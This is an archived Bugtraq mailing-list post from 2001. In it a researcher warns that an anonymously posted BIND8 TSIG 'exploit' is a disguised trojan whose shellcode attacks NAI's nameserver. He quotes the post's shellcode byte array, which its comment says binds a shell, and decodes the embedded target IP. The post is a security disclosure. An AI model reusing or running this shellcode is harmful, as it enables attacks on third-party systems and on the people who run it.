 | ||||||
| << Previous | INDEX | Search | src | Set bookmark | Go to bookmark | Next >> |
| ||||||
| |||||||||||||||||||||
Date: Wed, 31 Jan 2001 20:57:54 -0800 From: Max Vision <vision@WHITEHATS.COM> To: BUGTRAQ@SECURITYFOCUS.COM Subject: That BIND8 "exploit" attacks NAI Hi, Please beware of running code such as this. It will do it's best to attack NAI's nameserver. It's a typical, though well disguised, shellcode trick. Look in the Linux shellcode: \xa1\x45\x03\x96 == 161.69.3.150 == dns1.nai.com More details after I have a better look... Max At 04:12 PM 1/31/2001 -0700, you wrote: > >From Anonymous <nobody@replay.com> Wed Jan 31 18:06:24 2001 >Date: Thu, 31 Jan 2001 18:06:19 -0400 >From: Anonymous <nobody@replay.com> >To: BUGTRAQ@SECURITYFOCUS.COM >Subject: Bind8 exploit >Message-ID: <C5119AD12E92D311928E009027DE4CCA554903@replay.com> >Mime-Version: 1.0 >Content-Type: text/plain; charset="us-ascii" >X-Mailer: Internet Mail Service (5.5.2650.21) > > >/* > * Implements TSIG buffer mismanagement overflow for incorrect > signatures. That > * one was really nice bug! > * Thanks NAI for nice bug! > */ > >/* zeroes in all shellcodes are allowed - we encode them anyway.. */ >char linux_shellcode[] = /* modifyed Aleph1 linux shellcode to > * bind to tcp port 31338. hey aleph1 > * :) */ >"\xeb\x34\x5e\xbb\x01\x00\x00\x00\x89\xf1\xb8\x66\x00\x00\x00\xcd" >"\x80\x89\x46\x14\x8d\x46\x30\x89\x46\x18\x31\xc0\x89\x46\x20\x8d" >"\x46\x0c\x89\x46\x24\xb8\x66\x00\x00\x00\xbb\x0b\x00\x00\x00\x8d" >"\x4e\x14\xcd\x80\xeb\xef\xe8\xc7\xff\xff\xff\x02\x00\x00\x00\x02" >"\x00\x00\x00\x11\x00\x00\x00\x02\x00\x00\x35\xa1\x45\x03\x96\xff" >"\xff\xff\xff\xef\xff\xff\xff\x00\x04\x00\x00\x00\x00\x00\x00\x02" >"\x5f\x9a\x80\x10\x00\x00\x00/bin/sh\0";
| |||||||||||||||||||||